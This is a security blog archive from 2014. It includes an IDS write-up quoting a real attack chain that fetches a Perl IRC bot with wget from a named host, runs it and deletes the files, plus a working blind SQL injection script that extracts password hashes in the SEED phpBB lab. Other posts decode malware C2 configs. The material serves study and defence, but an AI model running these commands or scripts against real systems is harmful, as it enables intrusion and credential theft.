Monday, April 28, 2014

US Cyber Challenge Scoreboard Analysis

Prior to the competition closing on April 31, 2014 for the latest US Cyber Challenge, located at http://uscc.cyberquests.org, I thought I would do a quick analysis of the users who appear on the scoreboards.

Looking at the number of times the same user appears:

Appearances  User
7 jt
6 baldwintm
6 thepcnerd
5 devnull
5 jgbrigden
5 jimkoz23
5 jmoore
5 linuz
5 ltomczak
5 mkaplan
5 sonken
5 webdevgirl
5 wiredaemon
Only displaying the top 13 with 5 or more appearances on the scoreboards.

Another way to look at the numbers is below: the number of users that have appeared 7 times, 6 times, and so on.

Number of Users Total Appearances
1 7 times
2 6 times
10 5 times
15 4 times
25 3 times
100 2 times
909 1 time

I am a fan of the US Cyber Challenges and congratulate those who support it, fund it, and promote it.  Keep the challenges coming.

Saturday, April 26, 2014

Examining IDS Logs for PHP-CGI Query String Vulnerabilities

I noticed a few high severity events related to PHP-CGI Query String vulnerabilities going through the IDS and bouncing off of the webserver.

The first item was identifying it in the IDS as one of the below events:
ET Web_Specific_Apps PHP-CGI query string parameter vulnerability - CVE2012-1823

I am not necessarily going to focus on the exploit.  I want to focus on the information in the below screenshot:

As you can see, part of the vulnerability is to execute the following commands through PHP:
cd /tmp - Change to the /tmp directory
wget http://www.macam-informasi.com/bibah/bot.txt - Download bot.txt using wget
perl bot.txt - Use perl to execute the text file bot.txt that was previously downloaded
rm -rf bot.txt - Remove bot.txt once the perl bot.txt process terminates
rm -rf bot.txt* - Remove anything that starts with bot.txt, possibly because of temporary files that are created
rm -rf *.txt - Remove any temporary *.txt files that were created
rm -rf * - Remove any files in the /tmp directory
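As an added example that is not part of the original post, the following Python 3 code applies two checks to constructed web-server access-log lines: the php-cgi argument-injection shape behind the CVE-2012-1823 alert (a query string with no unencoded "=" whose first token starts with "-", which php-cgi then parsed as command-line options) and the cd /tmp; wget; perl; rm -rf chain listed above. The log lines, addresses, URL and the "-d example_directive" token are made up placeholders.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log lines for this example (addresses and URL are made up). Line 2
# carries the php-cgi argument-injection shape behind the CVE-2012-1823 alert, line 3 the
# cd /tmp; wget; perl; rm -rf chain described above, lines 1 and 4 are normal traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [26/Apr/2014:10:01:02 +0000] "GET /index.php?page=2 HTTP/1.1" 200 5120
203.0.113.9 - - [26/Apr/2014:10:02:10 +0000] "GET /index.php?-d+example_directive%3dvalue HTTP/1.1" 200 14
203.0.113.9 - - [26/Apr/2014:10:02:11 +0000] "GET /index.php?cmd=cd+/tmp;wget+http://example.invalid/bot.txt;perl+bot.txt;rm+-rf+bot.txt* HTTP/1.1" 200 0
198.51.100.7 - - [26/Apr/2014:10:03:00 +0000] "GET /search.php?q=-dash+leading+word HTTP/1.1" 200 900
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>[^ ?"]+)(?:\?(?P<query>[^ "]*))? HTTP/')
# Download-and-run chain from the alert: change to /tmp, fetch, run with perl, clean up.
CHAIN_RE = re.compile(r"cd\s+/tmp\s*;.*\b(wget|curl)\b.*\bperl\b.*\brm\s+-rf\b", re.I)

def classify_request(line):
    """Return the indicator names matched by one access-log line (empty list if none)."""
    m = REQUEST_RE.search(line)
    if not m or m.group("query") is None:
        return []
    raw_query = m.group("query")
    hits = []
    # CVE-2012-1823: with no unencoded '=' in the query string php-cgi split it on '+'
    # and treated the pieces as command-line options, so a leading '-' token is the tell.
    if "=" not in raw_query and raw_query.split("+", 1)[0].startswith("-"):
        hits.append("php-cgi-argv-injection")
    if CHAIN_RE.search(unquote_plus(raw_query)):
        hits.append("tmp-download-execute-chain")
    return hits

def scan_log(text):
    """Return (client_ip, indicators) for every line that matched at least one check."""
    findings = []
    for line in text.splitlines():
        hits = classify_request(line)
        if hits:
            findings.append((line.split(" ", 1)[0], hits))
    return findings

if __name__ == "__main__":
    for ip, hits in scan_log(SAMPLE_LOG):
        print(ip, ", ".join(hits))
```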

What if we submit the URL that is downloading bot.txt to virustotal?

What if we submit the file that is downloaded to virustotal?

Looking closer at the IRC bot that is executed:

As we can see from the first few lines, the IRC channel it connects to is #total at IP address 204.44.120.36, and later you find that the connection occurs over port 80.

Searching for the IP Address of 204.44.120.36 on arin.net we find:

I have a virtual machine that I am going to execute this bot.txt from and then capture the traffic going to this IRC channel:

As shown in the packet capture, it joins the IRC channel #total, probably with a password of "muietie".  It is also observed that the below DNS name is used for the IRC server:

If you log in manually to the IRC channel with the password that was captured:
You can see that 244 clients are in the room, i.e. the servers that have been infected through the PHP-CGI vulnerability.

Looking closer at my connection in the room and checking its info displays additional information about the connection:

From the channel the operators can interact with the Perl bot through IRC commands, which allows them to remotely control the server.  They also learn that every server in the list is vulnerable to the PHP-CGI vulnerability and could exploit it again in the future.

I have sent an email to the ISP to report this activity but wanted to document an instance of this that has been observed through checking the IDS logs.

Here is the email back from their abuse department:

abuse-ticket@quadranet.com
to me

Your abuse report has been submitted to our Abuse Department.

Our typical reaction time is 72 hours. If your abuse issue isn't handled within 96 hours please respond to this message.

Abuse Ticket Number: 881046

Thursday, April 24, 2014

Python Raw Socket to Create ICMP Packet

I had a challenge to recreate a raw packet from bytes given in a text file, and used Python to create the raw socket.  The commented code converts the bytes from text to hex.

#!/usr/bin/env python

import socket

# Raw layer-2 socket: the whole frame, Ethernet header included, is supplied by us.
# PF_PACKET (AF_PACKET) sockets are Linux only and need root.
rawSocket = socket.socket(socket.PF_PACKET, socket.SOCK_RAW, socket.htons(0x0800))
rawSocket.bind(("vmnet1", socket.htons(0x0800)))


# The packet as given in the text file: one long string of hex digits
#hexBytes = "000c29213dd1005056c00001080045000054b40a00004001905c0a0a112d0a0a11020000364e16070001c3190152013b030008090a0b0c0d0e0f101112131415161718191a1b1c1d1e1f202122232425262728292a2b2c2d2e2f3031323334353637"

# Turn each pair of hex digits into a "\xNN" escape; the output was pasted into hexPacket below
#counter = 1
#for letter in hexBytes:
#    if counter == 1:
#        firstLetter = letter
#        counter = 2
#    elif counter == 2:
#        print "\\x" + firstLetter + letter
#        counter = 1

# Ethernet header (14 bytes), IPv4 header (20 bytes) and a 64 byte ICMP echo reply
hexPacket = "\x00\x0c\x29\x21\x3d\xd1\x00\x50\x56\xc0\x00\x01\x08\x00\x45\x00\x00\x54\xb4\x0a\x00\x00\x40\x01\x90\x5c\x0a\x0a\x11\x2d\x0a\x0a\x11\x02\x00\x00\x36\x4e\x16\x07\x00\x01\xc3\x19\x01\x52\x01\x3b\x03\x00\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37"

rawSocket.send(hexPacket)
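As an added check that is not part of the original post, this Python 3 snippet parses the same hex bytes back into Ethernet, IPv4 and ICMP fields and recomputes both checksums, which is how you confirm a hand-built frame is well-formed before sending it from the raw socket.

```python
import struct

# The hex bytes from the post above, as one string (Ethernet header + IPv4 + ICMP echo reply).
FRAME_HEX = ("000c29213dd1005056c00001080045000054b40a00004001905c0a0a112d0a0a1102"
             "0000364e16070001c3190152013b030008090a0b0c0d0e0f101112131415161718191a"
             "1b1c1d1e1f202122232425262728292a2b2c2d2e2f3031323334353637")

def internet_checksum(data):
    """RFC 1071 one's-complement sum; evaluates to 0 over a header whose checksum field is correct."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF

def mac(raw):
    return ":".join("%02x" % b for b in raw)

def parse_frame(hex_string):
    """Decode the Ethernet, IPv4 and ICMP headers and verify both checksums."""
    frame = bytes.fromhex(hex_string)
    dst, src, ethertype = struct.unpack("!6s6sH", frame[:14])
    if ethertype != 0x0800:
        raise ValueError("not an IPv4 frame: ethertype 0x%04x" % ethertype)
    ip = frame[14:]
    (ver_ihl, _tos, total_len, _ident, _flags_frag, ttl, proto,
     _hdr_csum, s_ip, d_ip) = struct.unpack("!BBHHHBBH4s4s", ip[:20])
    ihl = (ver_ihl & 0x0F) * 4
    datagram = ip[:total_len]            # drop any Ethernet padding after the IP datagram
    icmp = datagram[ihl:]
    icmp_type, icmp_code, _icmp_csum, icmp_id, icmp_seq = struct.unpack("!BBHHH", icmp[:8])
    return {
        "eth_dst": mac(dst), "eth_src": mac(src),
        "src_ip": ".".join(str(b) for b in s_ip), "dst_ip": ".".join(str(b) for b in d_ip),
        "ttl": ttl, "proto": proto, "total_len": total_len,
        "ip_checksum_ok": internet_checksum(datagram[:ihl]) == 0,
        "icmp_type": icmp_type, "icmp_code": icmp_code, "icmp_id": icmp_id, "icmp_seq": icmp_seq,
        "icmp_checksum_ok": proto == 1 and internet_checksum(icmp) == 0,
        "payload_len": len(icmp) - 8,
    }

if __name__ == "__main__":
    for field, value in parse_frame(FRAME_HEX).items():
        print("%-17s %s" % (field, value))
```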

Sunday, April 20, 2014

SQL Injection Script written for SEED Labs

SEED Labs are located here: http://www.cis.syr.edu/~wedu/seed/
These are great labs to learn more about cyber security and penetration testing.

The below script was developed to demonstrate SQL Injection on the phpBB lab that they provide.  Though the lab itself does not require this, it was a great script to write.  With the script I extract the passwords for the 5 users that are found on the system.

This script could be made more efficient by using conditional comparisons instead of brute forcing each letter.

#!/usr/bin/env python

from socket import *

BUFSIZE = 1024

# Change the hostInput based on your IP Address of the SEED Installation of Ubuntu 9.
hostInput = '172.16.108.140'

userNames = ['admin', 'alice', 'bob', 'carol', 'ted']
#userNames = ['ted']

userPassword = ''
# Length of the POST body without any guessed characters; one byte is added per character guessed
contentLength = 63

for userName in userNames:
    for number in range(1, 30):
        contentLengthTotal = contentLength + number

        for letter in 'abcdefghijklmnopqrstuvwxyz0123456789':
            tcpServerSocket = socket(AF_INET, SOCK_STREAM)
            remoteServer = (hostInput, 80)
            tcpServerSocket.connect(remoteServer)

            searchRequest1 = "POST http://www.sqllabmysqlphpbb.com/search.php?mode=searchuser HTTP/1.1\n"
            searchRequest2 = "Host: www.sqllabmysqlphpbb.com\n"
            searchRequest3 = "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0 Iceweasel/18.0.1\n"
            searchRequest5 = "Accept-Language: en-US,en;q=0.5\n"
            searchRequest6 = "Content-Type: application/x-www-form-urlencoded\n"
            searchRequest7 = "Content-Length: " + str(contentLengthTotal) + "\n\n"
            # The injected LIKE clause matches when the stored hash starts with the letters guessed so far
            searchRequest8 = "search_username=4%27+OR+user_password+LIKE+%27" + userPassword + letter + "%25&search=Search\n\n\n"

            searchRequest = searchRequest1 + searchRequest2 + searchRequest3 + searchRequest5 + searchRequest6 + searchRequest7 + searchRequest8

            #print searchRequest

            tcpServerSocket.send(searchRequest)
            f = open('/tmp/output', 'w')
            initialLength = 0

            while True:
                pageReturned = tcpServerSocket.recv(BUFSIZE)
                if not pageReturned:
                    break
                #print pageReturned
                initialLength = initialLength + 1
                f.write(pageReturned)
                if initialLength == 14:
                    break

            f.close()
            tcpServerSocket.close()

            # The user shows up in the result list only when the injected condition was true
            f = open('/tmp/output', 'r')
            userNameInFile = '<option value="' + userName + '">'
            found = False
            for line in f:
                if userNameInFile in line:
                    found = True
                    break
            f.close()

            if found:
                # Keep this character and move on to the next position of the hash
                userPassword = userPassword + letter
                break

    print "The hash stored as the password for " + userName + " is " + userPassword
    userPassword = ''
    contentLength = 63
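For the defensive side of the same lab, an added example (not the author's code) that reproduces the injectable lookup against a constructed in-memory SQLite table and contrasts it with the parameterized form. The usernames and hashes are made up (MD5 of common weak passwords), and PAYLOAD is the script's search_username value, URL-decoded, before the guessed hash prefix is appended.

```python
import sqlite3

# Constructed stand-in for the lab's phpbb_users table: made-up accounts whose user_password
# column holds MD5 hashes as phpBB2 does (these are the hashes of "password", "123456", "admin").
USERS = [("admin", "5f4dcc3b5aa765d61d8327deb882cf99"),
         ("alice", "e10adc3949ba59abbe56e057f20f883e"),
         ("bob", "21232f297a57a5a743894a0e4a801fc3")]

# The script's search_username value, URL-decoded, without the guessed hash prefix.
PAYLOAD = "4' OR user_password LIKE '"

def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE phpbb_users (username TEXT, user_password TEXT)")
    db.executemany("INSERT INTO phpbb_users VALUES (?, ?)", USERS)
    return db

def search_users_vulnerable(db, search_username):
    """Builds the query by string concatenation, the flaw the script above exploits:
    the quote in the payload ends the username literal and the rest becomes SQL."""
    sql = ("SELECT username FROM phpbb_users WHERE username LIKE '"
           + search_username + "%' ORDER BY username")
    return [row[0] for row in db.execute(sql)]

def search_users_safe(db, search_username):
    """Same lookup with a bound parameter: the input is only ever a string value, never SQL,
    so the injected clause is compared against usernames and matches nothing."""
    sql = "SELECT username FROM phpbb_users WHERE username LIKE ? ORDER BY username"
    return [row[0] for row in db.execute(sql, (search_username + "%",))]

if __name__ == "__main__":
    db = make_db()
    for guess in "5ea":
        print(guess, search_users_vulnerable(db, PAYLOAD + guess),
              search_users_safe(db, PAYLOAD + guess))
```

With the vulnerable form each guess leaks which account's hash starts with that character, which is exactly the oracle the script above walks one character at a time; with the bound parameter every guess returns an empty list.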



ASCII to Hex Encoder - Another Version of a Previous Encoder

#!/bin/bash

# Usage: ./script-name <ASCII FILE> | tr -d '\n' > <ENCODED FILE>
# Take a file as the input

testInput=$1

# Print the \xNN escape for the single character passed in as $1
function encode {

    case ${1} in
        " ") echo "\x20" ;; "!") echo "\x21" ;; "\"") echo "\x22" ;;
        "#") echo "\x23"    ;; "$") echo "\x24" ;; "&") echo "\x26" ;;
        "%") echo "\x25"    ;; "'") echo "\x27" ;; "(") echo "\x28" ;;
        ")") echo "\x29" ;; '*') echo '\x2a' ;; '+') echo '\x2b' ;;
        ',') echo '\x2c' ;; '-') echo '\x2d' ;; '.') echo '\x2e' ;;
        "/") echo '\x2f' ;; '0') echo '\x30' ;; '1') echo '\x31' ;;
        '2') echo '\x32' ;; '3') echo '\x33' ;; '4') echo '\x34' ;;
        '5') echo '\x35' ;; '6') echo '\x36' ;; '7') echo '\x37' ;;
        '8') echo '\x38' ;; '9') echo '\x39' ;; ':') echo '\x3a' ;;
        ';') echo '\x3b' ;; '<') echo '\x3c' ;; '=') echo '\x3d' ;;
        '>') echo '\x3e' ;; '?') echo '\x3f' ;; '@') echo '\x40' ;;
        'A') echo '\x41' ;; 'B') echo '\x42' ;; 'C') echo '\x43' ;;
        'D') echo '\x44' ;; 'E') echo '\x45' ;; 'F') echo '\x46' ;;
        'G') echo '\x47' ;; 'H') echo '\x48' ;; 'I') echo '\x49' ;;
        'J') echo '\x4a' ;; 'K') echo '\x4b' ;; 'L') echo '\x4c' ;;
        'M') echo '\x4d' ;; 'N') echo '\x4e' ;; 'O') echo '\x4f' ;;
        'P') echo '\x50' ;; 'Q') echo '\x51' ;; 'R') echo '\x52' ;;
        'S') echo '\x53' ;; 'T') echo '\x54' ;; 'U') echo '\x55' ;;
        'V') echo '\x56' ;; 'W') echo '\x57' ;; 'X') echo '\x58' ;;
        'Y') echo '\x59' ;; 'Z') echo '\x5a' ;; '[') echo '\x5b' ;;
        '\\') echo '\x5c' ;; ']') echo '\x5d' ;; '^') echo '\x5e' ;;
        '_') echo '\x5f' ;; '`') echo '\x60' ;; 'a') echo '\x61' ;;
        'b') echo '\x62' ;; 'c') echo '\x63' ;; 'd') echo '\x64' ;;
        'e') echo '\x65' ;; 'f') echo '\x66' ;; 'g') echo '\x67' ;;
        'h') echo '\x68' ;; 'i') echo '\x69' ;; 'j') echo '\x6a' ;;
        'k') echo '\x6b' ;; 'l') echo '\x6c' ;; 'm') echo '\x6d' ;;
        'n') echo '\x6e' ;; 'o') echo '\x6f' ;; 'p') echo '\x70' ;;
        'q') echo '\x71' ;; 'r') echo '\x72' ;; 's') echo '\x73' ;;
        't') echo '\x74' ;; 'u') echo '\x75' ;; 'v') echo '\x76' ;;
        'w') echo '\x77' ;; 'x') echo '\x78' ;; 'y') echo '\x79' ;;
        'z') echo '\x7a' ;; '{') echo '\x7b' ;; '|') echo '\x7c' ;;
        '}') echo '\x7d' ;; '~') echo '\x7e' ;;
        *) echo "$1" ;;
    esac

}

# IFS= keeps leading and trailing spaces of each line, read -r keeps backslashes intact
while IFS= read -r line
do

    for (( c=0; c<${#line}; c++ ))
    do
        # Quote the character so spaces and glob characters (* ? [) reach encode unchanged
        encode "${line:$c:1}"
    done

    echo "\x0a"

done < "$testInput"

echo "\n"

Saturday, April 19, 2014

Python - XOR a File

This script originates from http://stackoverflow.com/questions/5037762/xor-each-byte-with-0x71

#!/usr/bin/python

# XOR every byte of file.txt with 0x71 and write the result to xorFile.txt
with open("file.txt", "rb") as infile:      # binary mode so no byte is altered on read
    data = bytearray(infile.read())
for i in range(len(data)):
    data[i] ^= 0x71

with open("xorFile.txt", "wb") as outfile:
    outfile.write(data)

Python Parser for CaptureBAT Output

From the command line where CaptureBAT is running I use the following syntax:
"CaptureBAT.exe -c -n -l outputCaptureBat.log"

Then copy the log file to where the python script is located.

#!/usr/bin/python

import sys

def parseFile(file, filter, specific):
    duplicate3rdItem = ""
    duplicate4thItem = ""

    for line in file:
        items = line.split(',')
        if len(items) < 5:
            continue
        if items[1] == filter and items[2] == specific:
            # Find the duplicates and remove them: a line is a duplicate only when both
            # the 3rd and the 4th field match the previous line printed
            if items[3] != duplicate3rdItem or items[4] != duplicate4thItem:
                print items[0] + " " + items[3] + " " + items[4].rstrip()
                duplicate3rdItem = items[3]
                duplicate4thItem = items[4]


if len(sys.argv) >= 2:
    # The log file name comes from the command line (see the usage line below)
    outputFile = sys.argv[1]
    parseValues = [ ['"file"', '"Write"', 'Files Written'], ['"file"', '"Delete"', 'Files Deleted'],
                    ['"process"', '"Created"', 'Processes Created'], ['"process"', '"terminated"', 'Processes Terminated'],
                    ['"registry"', '"DeleteValueKey"', 'Registry Deleted Value'], ['"registry"', '"SetValueKey"', 'SetValueKey'] ]
    for item in parseValues:
        print "\n" + item[2]
        print "-----------------------------------------------------------------------------------------------"
        with open(outputFile, "r") as file:
            parseFile(file, item[0], item[1])
else:
    print "Usage: ./script outputCaptureBat.log"

Wednesday, April 16, 2014

Python - base64 Decode and XOR brute force Config File Leading to C2 Server


This script is the same as the one below, except that it brute forces the XOR key instead of assuming that the key is 0xe8.

#!/usr/bin/python

# Malware found on virus total
# Modified variant of the Project Hook point-of-sale malware
# Fetches an obfuscated file containing additional C&C domains:
# http://www.localhost0x2.net/config/config_01.bin
# File content is XOR'ed using 0xE8, then Base64 encoded.

# Original File Content - config_01.bin
# gJycmNLHx5+fn8aEh4uJhICHm5zYkNrGho2c
# gJycmNLHx4Sdi4ORxYydhZibxoqBkg==

import base64

# Take the base64 given and decode it and add it to a list
base64info = "gJycmNLHx5+fn8aEh4uJhICHm5zYkNrGho2cgJycmNLHx4Sdi4ORxYydhZibxoqBkg=="
decodedInfo = base64.b64decode(base64info)
infoDecoded = decodedInfo.encode("hex")

# Take the list and make the values of the list a hex number as a string
info = []
counter = 1
for letter in infoDecoded:
    if (counter == 1):
        listItem = '0x' + letter
        counter = 2
    elif (counter == 2):
        listItem = listItem + letter
        info.append(listItem)
        counter = 1



#xorKey = 0xe8
# Redesigned to brute force the xorKey
for xorValue in range(0, 256):
    # Define the new list of where the hex will go after XORed with the xorKey
    newInfo = []
    xorKey = hex(xorValue)
    #print xorKey
    for counter in range(0, len(info)):
        # XOR each byte with the key and keep exactly two hex digits ('%02x'); hex()[2:]
        # drops the leading zero of values below 0x10 and misaligns the hex decode below
        newInfo.append('%02x' % (int(info[counter], 16) ^ int(xorKey, 16)))

    # Print the list joined together as a string and then decode the hex to ascii.
    # Keys 144 and 145 (0x90, 0x91) are skipped.
    if xorValue not in (144, 145):
        try:
            print str(xorKey) + ' ' + ''.join(newInfo).decode("hex")
        except TypeError:
            print str(xorKey) + ' Failed to decode Hex'

Tuesday, April 15, 2014

Python - base64 Decode and XOR with 0xe8 Config File Leading to C2 Server

#!/usr/bin/python

# Malware found on virus total
# Modified variant of the Project Hook point-of-sale malware
# Fetches an obfuscated file containing additional C&C domains:
# http://www.localhost0x2.net/config/config_01.bin
# File content is XOR'ed using 0xE8, then Base64 encoded.

# Original File Content - config_01.bin
# gJycmNLHx5+fn8aEh4uJhICHm5zYkNrGho2c
# gJycmNLHx4Sdi4ORxYydhZibxoqBkg==

import base64

# Take the base64 given and decode it and add it to a list
base64info = "gJycmNLHx5+fn8aEh4uJhICHm5zYkNrGho2cgJycmNLHx4Sdi4ORxYydhZibxoqBkg=="
decodedInfo = base64.b64decode(base64info)
infoDecoded = decodedInfo.encode("hex")

# Take the list and make the values of the list a hex number as a string
info = []
counter = 1
for letter in infoDecoded:
    if (counter == 1):
        listItem = '0x' + letter
        counter = 2
    elif (counter == 2):
        listItem = listItem + letter
        info.append(listItem)
        counter = 1


# Define the new list of where the hex will go after XORed with the xorKey
newInfo = []

xorKey = 0xe8

for counter in range(0, len(info)):
    # XOR each byte with the key and keep exactly two hex digits ('%02x'), so a result
    # below 0x10 keeps its leading zero and the joined string stays byte aligned
    newInfo.append('%02x' % (int(info[counter], 16) ^ xorKey))

# Print the list joined together as a string and then decode the hex to ascii
print ''.join(newInfo).decode("hex")
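One Python 3 version covering both the brute-force post above and the fixed-key post just above, added here and not the author's code: it decodes the base64 text from the posts, works on bytes directly (so bytes below 0x10 keep their leading zero, which the hex()[2:] approach loses), and ranks all 256 keys by how URL-like the output is rather than by a plain printable test, which nearby keys also pass. The URL character set and the 0.9 cut-off are this example's assumptions.

```python
import base64
import string

# The base64 text quoted in the two posts above (config_01.bin, both lines joined).
CONFIG_B64 = "gJycmNLHx5+fn8aEh4uJhICHm5zYkNrGho2cgJycmNLHx4Sdi4ORxYydhZibxoqBkg=="

# Bytes expected in a decoded URL list: letters, digits and the separators URLs use.
# Plain "is printable" is too loose: nearby keys such as 0xe9 also yield all-printable text.
URL_CHARS = set((string.ascii_letters + string.digits + ".:/-_").encode())

def xor_single_byte(data, key):
    """XOR every byte with one key byte, bytes in and bytes out (no hex round trip, so
    values below 0x10 keep their leading zero, the bug in the hex()[2:] approach)."""
    return bytes(b ^ key for b in data)

def url_score(data):
    """Fraction of bytes that look like URL text; 1.0 means every byte fits."""
    return sum(b in URL_CHARS for b in data) / len(data) if data else 0.0

def decode_with_key(b64_text, key):
    """The single-key version: base64 decode, then XOR with a key that is already known."""
    return xor_single_byte(base64.b64decode(b64_text), key)

def brute_force_xor(b64_text, min_score=0.9):
    """Try all 256 keys and return (key, plaintext) pairs, best scoring first."""
    raw = base64.b64decode(b64_text)
    scored = []
    for key in range(256):
        plain = xor_single_byte(raw, key)
        score = url_score(plain)
        if score >= min_score:
            scored.append((score, key, plain))
    scored.sort(key=lambda item: (-item[0], item[1]))
    return [(key, plain) for _, key, plain in scored]

if __name__ == "__main__":
    for key, plain in brute_force_xor(CONFIG_B64):
        print("0x%02x %.2f %r" % (key, url_score(plain), plain))
```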

Monday, April 7, 2014

Rewrite of Unquoted Path Vulnerability Script

$hash = @{
    "FullPath" = "ServiceValue"
}
$hash.keys | % {
    $name = $hash.Item($_)
    if(Test-Path ("hklm:\SYSTEM\CurrentControlSet\Services\" + $name)){
        $info = (Get-ItemProperty ("hklm:\SYSTEM\CurrentControlSet\Services\" + $name) -Name ImagePath -EA "SilentlyContinue").ImagePath
        #Check for quotes
        if ($info -eq "`"$_`""){
            #For testing: Write-Host "Has quotes!" $name $info
        }
        #Check for no quotes
        elseif ($info -eq $_){
            Write-Host "NO QUOTES!" $info #For Testing
            Set-ItemProperty ("hklm:\SYSTEM\CurrentControlSet\Services\" + $name) -Name ImagePath -Value "`"$_`""
        }
    }
}

Test Authentication from Linux Console using python3 pexpect

Working with the IT420 lab, you will discover that we need to discover a vulnerable user account.  The following python3 script uses the pex...